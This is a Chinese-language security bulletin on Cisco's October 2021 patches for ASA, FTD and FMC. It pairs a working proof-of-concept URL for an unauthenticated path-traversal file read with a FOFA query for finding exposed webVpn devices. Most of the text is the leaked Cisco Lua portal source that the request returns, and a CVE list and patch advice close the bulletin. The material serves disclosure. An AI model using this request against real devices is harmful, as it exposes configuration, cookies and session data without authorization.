漏洞概述
2021年10月27日,Cisco发布安全公告,修复了Cisco Firepower 威胁防御 (FTD)、Cisco思科自适应安全设备 (ASA)和Firepower 管理中心 (FMC)中的多个安全漏洞。
CISCO ASA远程任意文件读取
Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。
Cisco Adaptive Security Appliance (ASA)防火墙设备以及Cisco Firepower Threat Defense(FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
影响版本
Cisco ASA 设备影响版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
Cisco FTD设备影响版本:
6.2.2
6.2.3 < 6.2.3.16
6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
6.4.0 < 6.4.0.9 + Hot Fix
6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
6.6.0 < 6.6.0.1
漏洞复现
FOFA语法
“webVpn”
POC
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
-- Copyright (C) 2006-2014 by Cisco Systems, Inc.
-- Created by otrizna@cisco.com
ADD_HTTP_RESP_HEADER("X-Frame-Options", "SAMEORIGIN");
dofile("/+CSCOE+/include/common.lua")
dofile("/+CSCOE+/include/browser_inc.lua")
local function compare(a,b) return a["order"]<b["order"] end;
function INTERNAL_PASSWORD_ENABLED(name)
return false;
end
function CONF_VIRTUAL_KEYBOARD(name)
return false;
end
no_inheritance = false
custom_profile=""
asdm_custom_file = ""
function SetSessionData(index,name,value)
local f1
f1=io.open("/sessions/"..index.."/session_data","w")
if f1 then
io.set_metadata_int(f1,name,value)
f1:close()
end
end
function GetSessionData(index,name,value)
local f1
f1=io.open("/sessions/"..index.."/session_data","r")
if f1 then
local ret = io.get_metadata_int(f1,name)
f1:close()
return ret
end
return nil
end
function xValue(value)
if value then
local ret = string.gsub(value,"\"",""")
OUT(" value=\""..ret.."\"")
end
end
function sHTML(value)
if value then
ret = string.gsub(value,"&","&")
ret = string.gsub(ret,"<","<")
ret = string.gsub(ret,">",">")
return ret
end
return nil
end
function explode(str,delim)
local ret={}
for val in string.gfind(str,"[^"..delim.."]+") do
table.insert(ret, val)
end
return ret
end
function GetUrlLists()
local url_list_name
local url_lists = {}
local url_lists_str = SESSION_URL_LISTS()
for url_list_name in string.gfind(url_lists_str,"[^,]+") do
table.insert(url_lists, url_list_name)
end
return url_lists
end
function socket_url_parse(url, default)
-- initialize default parameters
local parsed = {}
for i,v in pairs(default or parsed) do parsed[i] = v end
-- empty url is parsed to nil
if not url or url == "" then return nil, "invalid url" end
-- remove whitespace
-- url = string.gsub(url, "%s", "")
-- get fragment
--[[
url = string.gsub(url, "#(.*)$", function(f)
parsed.fragment = f
return ""
end)
--]]
-- get scheme
url = string.gsub(url, "^([%w][%w%+%-%.]*)%:",
function(s) parsed.scheme = s; return "" end)
-- get authority
url = string.gsub(url, "^//([^/%?]*)", function(n)
parsed.authority = n
return ""
end)
-- get query stringing
url = string.gsub(url, "%?(.*)", function(q)
parsed.query = q
return ""
end)
-- get params
url = string.gsub(url, "%;(.*)", function(p)
parsed.params = p
return ""
end)
-- path is whatever was left
if url ~= "" then parsed.path = url end
local authority = parsed.authority
if not authority then return parsed end
authority = string.gsub(authority,"^([^@]*)@",
function(u) parsed.userinfo = u; return "" end)
local ipv6 = false
if(string.sub(authority,1,1) == "[") then
authority = string.gsub(authority,"^%[(.-)%]",
function(u) parsed.host = u; ipv6 = true; return "" end)
end
authority = string.gsub(authority, ":([^:]*)$",
function(p) parsed.port = p; return "" end)
if authority ~= "" and not ipv6 then parsed.host = authority end
local userinfo = parsed.userinfo
if not userinfo then return parsed end
userinfo = string.gsub(userinfo, ":([^:]*)$",
function(p) parsed.password = p; return "" end)
parsed.user = userinfo
return parsed
end
function ParseURL(url)
local durl = {
url = "",
scheme = "",
authority = "",
path = "",
params = "",
query = "",
fragment = "",
userinfo = "",
host = "",
port = "",
user = "",
password = ""
}
local nurl = socket_url_parse(url, durl)
return nurl.scheme,nurl.host,nurl.port,nurl.path .. (((nurl.query or "") ~= "" and ("?"..nurl.query)) or "")
end
function GetAppInfo(apps)
local protocol={}
local app_info={}
for _,app in apps do
app_info[app["id"]] = app
if nil ~= app["protocol"] and app["mode"] ~= "disable" then
for p in string.gfind(app["protocol"] or "","[%w]+") do
protocol[p]=app["id"]
end
end
end
return app_info,protocol
end
function GetLogonFields()
local fields= {{id="group",name="Group",order=100},
{id="username",name="Username",order=200},
{id="password",name="Password",order=300},
{id="internal-password", name="Internal Password",order=400},
{id="secondary-username", name="Second Username",order=500},
{id="secondary-password", name="Second Password",order=600}}
for i,fld in ipairs(fields) do
local order = CUSTOM("auth-page/form-order/"..fields[i]["id"])
if fld["id"]=="internal-password" and
(not order or order == "") and
CUSTOM("auth-page/logon-form/internal-password-first") == "yes" then
order = 250 -- backward compatibility with the old customization setting
end
if (order and order ~= "") then fld["order"]=tonumber(order) end
end
table.sort(fields,function (a,b) return a["order"] < b["order"] end)
return fields
end
function LOAD_URL_LIST(name,absolute_path,bookmark_number)
local f
local ret={}
local sso_enabled=0;
local name_md5 = MD5(name)
if absolute_path and "" ~= absolute_path then
f=io.open(absolute_path,"r")
else
f=io.open("/bookmarks/"..name_md5,"r")
end
if not f then return {} end
local function get_value(value)
if not value then return nil end
if string.len(value) == 0 then return "" end
return string.sub(value,2)
end
local path = "/url-list/"
local function lget_value(textdomain,value)
if nil == value then return nil end
if string.len(value) == 0 then return "" end
if string.sub(value,1,1) == '+' then
if string.len(value) > 1 then
return gettext.dgettext(textdomain,string.sub(value,2))
else
return ""
end
else
return string.sub(value,2)
end
end
ret["list"] = name_md5
ret["title"] = lget_value("url-list",io.get_metadata_str(f,path.."title"))
ret["favorite"] = get_value(io.get_metadata_str(f,path.."favorite"));
ret["bookmark"]={}
local i = bookmark_number or 1
while true do
local path = "/url-list/bookmark/"..i.."/"
local url = get_value(io.get_metadata_str(f,path.."url"));
if nil ~= url then
ret["bookmark"][i]={}
ret["bookmark"][i]["n"]=i
ret["bookmark"][i]["list"] = name_md5
ret["bookmark"][i]["id"] = get_value(io.get_metadata_str(f,path.."id"))
ret["bookmark"][i]["favorite"] = get_value(io.get_metadata_str(f,path.."favorite"))
ret["bookmark"][i]["title"] = lget_value("url-list",io.get_metadata_str(f,path.."title"))
ret["bookmark"][i]["method"] = get_value(io.get_metadata_str(f,path.."method"))
ret["bookmark"][i]["subtitle"] = lget_value("url-list",io.get_metadata_str(f,path.."subtitle"))
ret["bookmark"][i]["thumbnail"] = lget_value("url-list",io.get_metadata_str(f,path.."thumbnail"))
ret["bookmark"][i]["smart-tunnel"] = get_value(io.get_metadata_str(f,path.."smart-tunnel"))
ret["bookmark"][i]["window"] = get_value(io.get_metadata_str(f,path.."window"))
ret["bookmark"][i]["wait-time"] = get_value(io.get_metadata_str(f,path.."wait-time"))
ret["bookmark"][i]["preload-page-url"] = get_value(io.get_metadata_str(f,path.."preload-page-url"))
ret["bookmark"][i]["pre-login-page-url"] = get_value(io.get_metadata_str(f,path.."pre-login-page-url"))
ret["bookmark"][i]["control-id"] = get_value(io.get_metadata_str(f,path.."control-id"))
ret["bookmark"][i]["before-post-script"] = get_value(io.get_metadata_str(f,path.."before-post-script"))
-- injected form submit
ret["bookmark"][i]["injected-form-submit"] = get_value(io.get_metadata_str(f,path.."injected-form-submit"))
ret["bookmark"][i]["pre-login-page-url"] = get_value(io.get_metadata_str(f,path.."pre-login-page-url"))
ret["bookmark"][i]["control-id"] = get_value(io.get_metadata_str(f,path.."control-id"))
ret["bookmark"][i]["login-page-url"] = get_value(io.get_metadata_str(f,path.."login-page-url"))
ret["bookmark"][i]["landing-page-url"] = get_value(io.get_metadata_str(f,path.."landing-page-url"))
ret["bookmark"][i]["form-id"] = get_value(io.get_metadata_str(f,path.."form-id"))
ret["bookmark"][i]["post-param"] = {}
url = get_value(io.get_metadata_str(f,path.."url"))
url = substitute_macro(url,false)
-- Normalize CIFS URLs (cifs://\\host/...)
if(string.sub(url,1,9)=="cifs://\\\\") then
url="cifs://"..(string.sub(url,10) or "")
url=string.gsub(url,"\\","/")
end
ret["bookmark"][i]["url"] = url
if string.find(ret["bookmark"][i]["url"], "csco_sso=1") then
sso_enabled=1;
end
local j=1
while true do
local path = "/url-list/bookmark/"..i.."/post-param/"..j.."/"
local name = get_value(io.get_metadata_str(f,path.."name"))
if nil ~= name then
ret["bookmark"][i]["post-param"][j]={}
ret["bookmark"][i]["post-param"][j]["name"] = get_value(io.get_metadata_str(f,path.."name"))
ret["bookmark"][i]["post-param"][j]["value"] = get_value(io.get_metadata_str(f,path.."value"))
else
break
end
j=j+1
end
else
break
end
-- if loading just one bookmark from the list
if bookmark_number then
break
end
i=i+1
end
f:close()
local sso = io.open("sessions/"..SESSION_INDEX().."/sso","w")
if sso then
if 1 == sso_enabled then
-- allow sso call
io.set_metadata_str(sso, "allowed", "yes")
end
sso:close()
end
return ret
end
function post_params2js_array(bookmark)
return "[{ 'l' : '"..(bookmark["list"] or "").."', 'n' : "..(bookmark["n"] or "0").."}]"
--[[
local post_params="null"
if table.getn(bookmark["post-param"])>0 then
post_params = "["
for i,prm in bookmark["post-param"] do
local name
name = string.gsub(prm["name"],"'","\\'") or "";
name = string.gsub(name,"\\","\\\\") or "";
local value
value = string.gsub(prm["value"],"'","\\'") or "";
value = string.gsub(value,"\\","\\\\") or "";
post_params = post_params ..(((i>1) and ",") or "" ) .. "{name : '"..name.."', value : '"..value.."'}"
end
post_params = post_params.."]"
end
return post_params
--]]
end
function show_bookmarks()
end
function BookmarkApplyACL(bookmark,proto,host,port,path,defports,otherports)
if (port ~= nil and port ~= "") then
bookmark["enabled"],bookmark["dns_error"] = SESSION_CHECK_URL(proto,host,port,path);
else
--check default port
if (defports[proto]) then
bookmark["enabled"],bookmark["dns_error"] = SESSION_CHECK_URL(proto,host,defports[proto],path);
end
--check other ports, if there are any
if (otherports[proto]) then
local i, p = next(otherports[proto])
while (i and bookmark["enabled"]) do
bookmark["enabled"],bookmark["dns_error"] = SESSION_CHECK_URL(proto,host,p,path)
i, p = next(otherports[proto], i)
end
end
end
end
function BookmarkApplySupportCheck(bookmark)
if (bookmark["method"] == "post" and bookmark["smart-tunnel"] == "yes" and browser_info.os ~= "Windows") then
bookmark["support_error"] = 1
bookmark["enabled"] = false
end
end
function GROUP_SELECTOR_ENABLED()
return true;
end
function print_tree(s,d)
if(nil == d) then d = 0 end
if(nil == s) then OUT("nil");return end
for k,v in s do
OUT(string.rep(" ",d*5)); OUT(k);
if(type(v)=="table") then
OUT("<BR>");
print_tree(v,d+1)
else
if(type(v)=="boolean") then
if v then OUT( "#true") else OUT(" #false") end
OUT("<br>")
else
if(type(v)=="function") then
OUT("= (function)<br>")
else
OUT("="..v.."<BR>");
end
end
end
end
end
function mangle_url(str)
local s,e,p
local path;
if nil == str then return "/+CSCOE+/blank.html" end
s, e = string.find(str,"http[s]?://([^/?]+)")
if(s ~= nil) then
p = ((string.sub(str,e+1,e+1) == "/") and e+1 ) or e
path = string.sub(str,p+1);
return '/+CSCO+00'..ROT13STR2HEX(string.sub(str,1,e))..'++/'..path;
end
end
function get_applications(no_session_check)
--
-- This function may be used in context where there is no webvpn session (for example Customization Editor)
-- Use if(not no_session_check) in places where you retrieve session data
--
local c_app = {};
local n1 = 0
local n2 = 0
local i = 0;
local lang
if is_asdm then
lang = "en"
else
lang = get_selected_language()
end
-- Stock applications
local app = {}
i=i+1
app[i]={}
app[i]["tab-title"] = L("Home")
app[i]["id"] = "home"
app[i]["order"] = i*1000
i=i+1
app[i]={}
app[i]["tab-title"] = L("Web Access")
app[i]["id"] = "web-access"
app[i]["protocol"] = "http,https"
app[i]["default-port"] = "80,443"
app[i]["url-list-title"] = L("Web Bookmarks")
app[i]["order"] = i*1000
i=i+1
app[i]={}
app[i]["tab-title"] = L("File Access")
app[i]["id"] = "file-access"
app[i]["protocol"] = "cifs,ftp"
app[i]["default-port"] = "138,21"
app[i]["other-port"] = {cifs = {"139"}}
app[i]["url-list-title"] = L("File Bookmarks")
app[i]["order"] = i*1000
i=i+1
app[i]={}
app[i]["tab-title"] = L("Application Access")
app[i]["id"] = "app-access"
app[i]["url-list-title"] = L("File Bookmarks")
app[i]["order"] = i*1000
i=i+1
app[i]={}
app[i]["tab-title"] = L("AnyConnect")
app[i]["id"] = "net-access"
app[i]["order"] = i*1000
if IS_TARGET_UNICORN then
i=i+1
app[i]={}
app[i]["tab-title"] = L("Terminal Servers")
app[i]["id"] = "rdp"
app[i]["order"] = i*1000
app[i]["protocol"] = "rdp"
app[i]["default-port"] = "800"
app[i]["type"] = "1"
end
-- Plugins
local a = lfs.attributes("/plugin")
if a and a.mode == "directory" then
for fname in lfs.dir ("/plugin") do
if fname ~= "." and fname ~= ".." then
local f=io.open("/plugin/"..fname.."/index.html","r")
if f then
i=i+1
app[i]={}
app[i]["tab-title"] = io.get_metadata_str(f,"tab-title")
app[i]["url-list-title"] = io.get_metadata_str(f,"bookmark-title")
if lang and lang ~= "en" and lang ~= "en-us" then
app[i]["tab-title"] = io.get_metadata_str(f,lang..":tab-title") or app[i]["tab-title"]
app[i]["url-list-title"] = io.get_metadata_str(f,lang..":bookmark-title") or app[i]["url-list-title"]
end
app[i]["id"] = io.get_metadata_str(f,"id")
app[i]["protocol"] = io.get_metadata_str(f,"protocol")
-- TODO facilitate default port from plugin's manifest
local p_protocol = {}
for s in string.gfind(app[i]["protocol"],"[%w]+") do
table.insert(p_protocol,"0")
end
app[i]["default-port"] = table.concat(p_protocol,",")
app[i]["type"] = "1"
app[i]["order"] = i*1000
f:close()
end
end
end
end
c_app = CUSTOM_OBJECTS("/custom/portal/application",{{"id",false},{"order",false},{"tab-title",true},{"url-list-title",true},{"mode",false}})
n1= table.getn(c_app);
n2= table.getn(app);
for i1 = 1,n1,1 do
for i2 = 1,n2,1 do
if(app[i2]["id"] == c_app[i1]["id"]) then
if(nil ~= c_app[i1]["order"]) then app[i2]["order"] = tonumber(c_app[i1]["order"]); end;
if(nil ~= c_app[i1]["tab-title"]) then app[i2]["tab-title"] = c_app[i1]["tab-title"]; end;
if(nil ~= c_app[i1]["mode"]) then app[i2]["mode"] = c_app[i1]["mode"]; end;
if(nil ~= c_app[i1]["url-list-title"]) then app[i2]["url-list-title"] = c_app[i1]["url-list-title"]; end;
end;
end;
end;
if not no_session_check then
local ua = HTTP_HEADER_BY_NAME('user-agent')
local stapps = ""
if (ua and string.find (ua, "Macintosh")) then
stapps = SESSION_GET_SMART_TUNNELED_APPS("mac")
--[[
elseif (ua and string.find (ua, "Linux")) then
stapps = SESSION_GET_SMART_TUNNELED_APPS("linux")
--]]
elseif (ua) then
stapps = SESSION_GET_SMART_TUNNELED_APPS("windows")
end
local no_smart_tunnel = stapps == ""
for i2 = 1,n2,1 do
if (app[i2]["id"] == "net-access" and not (SESSION_ANYCONNECT_ENABLED() and SESSION_ANYCONNECT_CONFIGURED())) or (app[i2]["id"] == "app-access" and not (SESSION_FEATURE_ENABLED("port-forwarding")) and no_smart_tunnel) then
app[i2]["mode"] = "disable"
end
end
end
table.sort(app,compare);
return app;
end;
function GetColumns()
local cols = CUSTOM_OBJECTS("/custom/portal/column",{{"width",false,"percent"},{"order",false,nil,"0"}})
local function s(a,b)
return tonumber(a["order"])<tonumber(b["order"])
end
if table.getn(cols) == 0 then
return {{width="100",order="0",pane={}}}
end
table.sort(cols,s)
for _,col in cols do
col["pane"]={}
end
return cols
end
function CUSTOM_OBJECTS(path,fields)
local f
local ret
id = fields[1][1]
local first_item = path.."/1/"..id
if "" ~= asdm_custom_file then
f=io.open(asdm_custom_file,"r")
else
f=io.open("/customization/"..MD5(custom_profile),"r")
end
if nil == f then return {} end
ret = {}
for i=1,10000,1 do
ptype = io.get_metadata_str(f,path.."/"..i.."/"..id)
if nil == ptype then break end
ret[i]= {}
for _,fname in fields do
local name = fname[1]
local can_localize = fname[2]
local type = fname[3]
local def_value = fname[4]
ret[i][name] = io.get_metadata_str(f,path.."/"..i.."/"..name)
if ret[i][name] and string.len(ret[i][name]) > 1 then
if type then
if type == "number" then
ret[i][name] = tonumber(string.sub(ret[i][name],2))
end
if type == "percent" then
ret[i][name] = string.gsub(ret[i][name],"%%"," ")
ret[i][name] = tonumber(string.sub(ret[i][name],2)) or 0
end
else
local localize = string.sub(ret[i][name],1,1)
if localize == "+" and can_localize then
ret[i][name] = gettext.dgettext("customization",string.sub(ret[i][name],2))
else
ret[i][name] = string.sub(ret[i][name],2)
end
end
else
ret[i][name] = def_value
end
end
end
f:close()
return ret
end
function CUSTOM(param,default,localize)
local f;
local function file_name()
if "" ~= asdm_custom_file then
return(asdm_custom_file)
else
return "/customization/"..MD5(custom_profile)
end
end
f=io.open(file_name(),"r")
if not f then return default end
local s = io.get_metadata_str(f,"/custom/"..param);
f:close()
if s and string.len(s)>1 then
local localize = string.sub(s,1,1)
if localize == "-" then
return string.sub(s,2)
else
return gettext.dgettext("customization",string.sub(s,2))
end
end
if nil == default then default = "" end
return default
end
function CheckAlerts()
local reason = 0
local user_alert = SESSION_USER_ALERT()
local idle_alert_time = SESSION_IDLE_ALERT_INTERVAL() * 60
local end_alert_time = SESSION_END_ALERT_INTERVAL() * 60
local max_connect_time = SESSION_MAX_CONNECT_TIME()
tin = max_connect_time -(SESSION_TIME() - SESSION_LOGIN_TIME())
if end_alert_time > 0 and max_connect_time ~=0 and tin <= end_alert_time + 5 then
reason=1
else
tin = SESSION_MAX_IDLE_TIME() - SESSION_IDLE_TIME()
if idle_alert_time > 0 and tin <= idle_alert_time + 5 then
reason = 2
end
end
if reason == 0 and (not user_alert or user_alert=="" ) then return false end
return true
end
function FileURL(url)
return "javascript: parent.doURL('"..ROT13STR2HEX(clean_escape(url)).."','','',false,'', false)";
end
function GetPostParams()
local s
local state = 10
local params = {}
local name=nil
while nil~=state do
s,state = HTTP_READ_URL_ENCODED_BODY(state)
if state == 10 then
params[name]=HTTP_URL_DECODE(s,1)
elseif state==15 then
name = HTTP_URL_DECODE(s,1)
params[name]=""
name=nil
elseif state==20 then
name = HTTP_URL_DECODE(s,1)
params[name]=""
elseif state==30 then
if nil == name then
params[HTTP_URL_DECODE(s,1)]=""
else
params[name]=HTTP_URL_DECODE(s,1)
end
break;
end
end
return params
end
function UpdateAsdmSession(cookie)
if not IS_TARGET_UNICORN then
local f=io.open('asdm/'..cookie, "a+")
if f ~= nil then
f:close()
return true;
end
end
end
function CheckAsdmSession(cookie, no_redirect)
-- remove expired
local diff
TRACE_CUSTOM("ASDM Cookie = "..(cookie or ""),10)
pcall(function()
for file in lfs.dir("asdm") do
if file ~= "." and file ~= ".." then
local f = 'asdm/'..file
local attr = lfs.attributes (f)
assert (type(attr) == "table")
diff = (SESSION_TIME() - attr["modification"])
if diff > 360000 then
os.remove(f)
end
end
end
end)
local f=io.open('asdm/'..cookie, "r")
if f ~= nil then
f:close()
return true;
end
if not no_redirect then
OUT("<script>top.close(); top.location.replace('/+CSCOE+/blank.html')</script>")
end
TRACE_CUSTOM("Wrong ASDM cookie = "..(cookie or "").."\n",1)
return false,diff
end
function GetDefaultPorts(applications)
local ret={}
local extra={}
for _,ap in applications do
local protocol={}
local ports={}
if ap["protocol"] then
for s in string.gfind(ap["protocol"],"[%w]+") do
table.insert(protocol,s)
end
if ap["default-port"] then
for s in string.gfind(ap["default-port"],"[%w]+") do
table.insert(ports,s)
end
end
for i,v in protocol do
ret[v]=ports[i]
if ap["other-port"] then
extra[v]=ap["other-port"][v]
end
end
end
end
return ret,extra
end
function GetRGB(a)
local r = tostring(tonumber(string.sub(a, 2, 3), 16))
local g = tostring(tonumber(string.sub(a, 4, 5), 16))
local b = tostring(tonumber(string.sub(a, 6, 7), 16))
return r,g,b
end
function gui_title_style(page)
local title_style = CUSTOM(page.."/title-panel/style","")
local ret = ""
if title_style ~= "" then
ret = "."..page.."-title {"..title_style.."}"
else
local bgc = CUSTOM(page.."/title-panel/background-color","#2b76ad")
local color = CUSTOM(page.."/title-panel/font-color","#ffffff")
local font_size = CUSTOM(page.."/title-panel/font-size","")
local font_weight = CUSTOM(page.."/title-panel/font-weight","")
local gradient = CUSTOM(page.."/title-panel/gradient","no")
local gr=""
if gradient=="yes" then
local r,g,b = GetRGB(bgc)
gr="background-image:url('/+CSCOU+/gradient.gif?r="..r.."&g="..g.."&b="..b.."');"
else
gr="background-color:"..bgc..";"
end
ret = ret .. "."..page.."-title {"
ret = ret .. ((color ~="" and "color:"..color..";") or "")
ret = ret .. ((font_size ~="" and "font-size:"..font_size..";") or "")
ret = ret .. ((font_weight ~="" and "font-weight:"..font_weight..";") or "")
ret = ret .. gr
ret = ret .. "}\n"
end
if page=="auth-page" then
local bgc = CUSTOM(page.."/logon-form/title-background-color","")
local color = CUSTOM(page.."/logon-form/title-font-color","")
ret = ret .. "."..page.."-form-title {"
ret = ret .. ((bgc ~="" and "background-color:"..bgc..";") or "")
ret = ret .. ((color ~="" and "color:"..color..";") or "")
ret = ret .. "}\n"
end
return ret
end
function get_persistant_setting(key)
local ret=""
local f=io.open("/sessions/"..SESSION_INDEX().."/key-value","r")
if(nil ~= f) then
ret = io.get_metadata_str(f, key)
if(nil == ret) then
ret=""
end
f:close()
end
return ret
end
function set_persistant_setting(key,value)
local ret=""
local f=io.open("/sessions/"..SESSION_INDEX().."/key-value","w")
if(nil ~= f) then
io.set_metadata_str(f, key, value)
f:close()
end
end
function ExtractLuaErrorString(s)
local b,e
if s then
b,e = string.find(s,":[0-9]+:")
while b do
s = string.sub(s,e+1)
b,e = string.find(s,":[0-9]+:")
end
end
return s
end
function reset_cookies_on_logout ()
ADD_HTTP_RESP_HEADER("Set-Cookie","webvpn="..( (IS_TARGET_UNICORN and "99@1111111111@222222222@3333333333; path=/" ) or "; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure"));
ADD_HTTP_RESP_HEADER("Set-Cookie","webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure");
ADD_HTTP_RESP_HEADER("Set-Cookie","webvpn_portal=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure");
--CSCtu28428: Remove webvpnSharePoint cookie every time when Logon/Logout procedure executed, it should
--help us avoid situation when MS PowerPoint uses cookie which had expired webvpn session
ADD_HTTP_RESP_HEADER("Set-Cookie","webvpnSharePoint=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure");
ADD_HTTP_RESP_HEADER("Set-Cookie","webvpnlogin=1; path=/; secure");
ADD_HTTP_RESP_HEADER("Set-Cookie","sdesktop=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure");
end
function SESSION_GET_ONE_TIME_PASSWORD ()
local session = HTTP_COOKIE_BY_NAME ("webvpn")
local token = string.format ("%x%x%x%x",get_random(),get_random(),get_random(),get_random())
local id = get_aware_session_index ()
local fp = io.open (string.format ("/sessions/%d/%s", id, token),"w")
if nil ~= fp then
fp:write (session)
fp:close ()
return tostring (id) .. "/" .. token
else
return nil
end
end
function SESSION_GET_ID (token)
local session = nil
if nil == token then
return session;
end
local name = "/sessions/" .. token
local a = lfs.attributes (name)
if a and a.mode == "file" then
local fp = io.open (name, "r")
if nil ~= fp then
session = fp:read ("*all")
fp:close ()
os.remove (name)
end
end
return session
end
function GetGroupCustomization(gr,param,default)
local custom_profile = CONF_TUNNEL_GROUP_CUSTOM_PROFILE(gr) or "DflCustomization"
if custom_profile == "" then custom_profile = "DfltCustomization" end
local file_name = "/customization/"..MD5(custom_profile)
local f=io.open(file_name,"r")
if nil == f then return default end
local s = io.get_metadata_str(f,"/custom/"..param);
f:close()
if s and string.len(s)>1 then
local localize = string.sub(s,1,1)
if localize == "-" then
return string.sub(s,2)
else
return gettext.dgettext("customization",string.sub(s,2))
end
end
return default or ""
end
function get_macro_values(substitute_password)
local macro = {}
-- otrizna:
-- CSCO_WEBVPN_MACRO1 and CSCO_WEBVPN_MACRO2 are arbitrary strings from LDAP.
-- We use it without encoding because we do not know if it is already encoded or not
-- The corresponding macro with the _ENCODED postfix should be used to force URL encoding
local macro_without_encoding = {CSCO_WEBVPN_MACRO1 = true, CSCO_WEBVPN_MACRO2 = true}
macro["CSCO_WEBVPN_CONNECTION_PROFILE"] = SESSION_TGROUP()
macro["CSCO_WEBVPN_MACRO1"] = SESSION_MACRO(1)
macro["CSCO_WEBVPN_MACRO2"] = SESSION_MACRO(2)
macro["CSCO_WEBVPN_MACRO1_ENCODED"] = macro["CSCO_WEBVPN_MACRO1"]
macro["CSCO_WEBVPN_MACRO2_ENCODED"] = macro["CSCO_WEBVPN_MACRO2"]
macro["CSCO_WEBVPN_USERNAME"] = SESSION_USERNAME()
macro["CSCO_WEBVPN_PRIMARY_USERNAME"] = SESSION_PRIMARY_USERNAME()
macro["CSCO_WEBVPN_SECONDARY_USERNAME"] = SESSION_SECONDARY_USERNAME()
if substitute_password then
macro["CSCO_WEBVPN_PASSWORD"] = SESSION_PASSWORD()
macro["CSCO_WEBVPN_PRIMARY_PASSWORD"] = SESSION_PRIMARY_PASSWORD()
macro["CSCO_WEBVPN_SECONDARY_PASSWORD"] = SESSION_SECONDARY_PASSWORD()
macro["CSCO_WEBVPN_INTERNAL_PASSWORD"] = SESSION_INTERNAL_PASSWORD()
end
return macro, macro_without_encoding
end
function substitute_macro(string_to_expand, substitute_password,is_not_url)
local macro_values, macro_without_encoding = get_macro_values(substitute_password)
for macro,value in macro_values do
local do_not_encode = macro_without_encoding[macro]
if is_not_url or do_not_encode then
-- simply substitute the macro if it is not in URL or it does not require encoding
string_to_expand = string.gsub(string_to_expand,macro,escapegsub(value or ""))
else
string_to_expand = string.gsub(string_to_expand,macro,escapegsub((value and socket.url.escape(value)) or ""))
end
end
return string_to_expand
end
function get_external_portal()
local p = {}
p["mode"] = CUSTOM("portal/external-portal/mode")
p["method"] = CUSTOM("portal/external-portal/method")
p["url"] = CUSTOM("portal/external-portal/url")
p["preload-page-url"] = CUSTOM("portal/external-portal/preload-page-url")
p["injected-form-submit"] = CUSTOM("portal/external-portal/injected-form-submit")
p["pre-login-page-url"] = CUSTOM("portal/external-portal/pre-login-page-url")
p["control-id"] = CUSTOM("portal/external-portal/control-id")
p["login-page-url"] = CUSTOM("portal/external-portal/login-page-url")
p["landing-page-url"] = CUSTOM("portal/external-portal/landing-page-url")
p["form-id"] = CUSTOM("portal/external-portal/form-id")
p["smart-tunnel"] = CUSTOM("portal/external-portal/use-smart-tunnel")
p["wait-time"] = CUSTOM("portal/external-portal/wait-time")
p["post-param"] = CUSTOM_OBJECTS("/custom/portal/external-portal/post-param",{{"name",""},{"value",""}})
p["before-post-script"] = CUSTOM("portal/external-portal/before-post-script")
return p
end
function get_bookmark(list_md5,bookmark_number)
local p = {}
local path = "/bookmarks/"..list_md5
local list = LOAD_URL_LIST(nil,path,bookmark_number)
return list["bookmark"][bookmark_number]
end
function output_metatag()
local ua = HTTP_HEADER_BY_NAME('user-agent')
if (ua and string.find (ua, "MSIE")) then
OUT("<meta http-equiv='X-UA-Compatible' content='IE=edge'/>")
end
end
漏洞详情
在本次修复的高危漏洞中,9个为拒绝服务漏洞,3个为命令注入漏洞,以及1个目录遍历漏洞:
CVE-2021-40116:多个 Cisco 产品 Snort 规则拒绝服务漏洞(CVSS评分:8.6)
CVE-2021-34783:思科自适应安全设备软件和 Firepower 威胁防御软件基于软件的 SSL/TLS 拒绝服务漏洞(CVSS评分:8.6)
CVE-2021-34781:思科 Firepower 威胁防御软件 SSH 连接拒绝服务漏洞(CVSS评分:8.6)
CVE-2021-34752、CVE-2021-34755和CVE-2021-34756:思科 Firepower 威胁防御软件命令注入漏洞(CVSS评分:7.8)
CVE-2021-34762:思科 Firepower 管理中心软件身份验证目录遍历漏洞(CVSS评分:8.1)
CVE-2021-40117:思科自适应安全设备软件和 Firepower 威胁防御软件 SSL/TLS 拒绝服务漏洞(CVSS评分:8.6)
CVE-2021-1573、CVE-2021-34704和CVE-2021-40118:思科自适应安全设备软件和 Firepower 威胁防御软件 Web 服务拒绝服务漏洞(CVSS评分:8.6)
CVE-2021-34792:思科自适应安全设备软件和 Firepower 威胁防御软件资源耗尽拒绝服务漏洞(CVSS评分:8.6)
CVE-2021-34793:思科自适应安全设备软件和 Firepower 威胁防御软件透明模式拒绝服务漏洞(CVSS评分:8.6)
其中,CVE-2021-34755 、CVE-2021-34756和CVE-2021-34752都是Cisco FTD 中的命令注入漏洞。由于对用户提供的命令参数验证不足,攻击者可以提交恶意输入来利用这些漏洞,前2个漏洞可以导致经过身份验证的本地攻击者以root权限在受影响设备的系统上执行任意命令,CVE-2021-34752可以导致经过身份验证且具有管理权限的本地攻击者以root权限在受影响设备的系统上执行任意命令。
CVE-2021-34762是由于思科 Firepower 管理中心 (FMC) 基于Web 的管理界面对HTTPS URL 的输入验证不足,经过身份验证的远程攻击者可以通过向受影响的设备发送包含目录遍历字符序列的恶意 HTTPS 请求来利用此漏洞,最终可以在设备上读取或写入任意文件。
处置建议
目前Cisco已经发布了相关补丁,建议受影响的用户及时升级更新。
具体受影响产品及其版本和修复版本信息详见Cisco官方安全公告:
https://tools.cisco.com/security/center/publicationListing.x
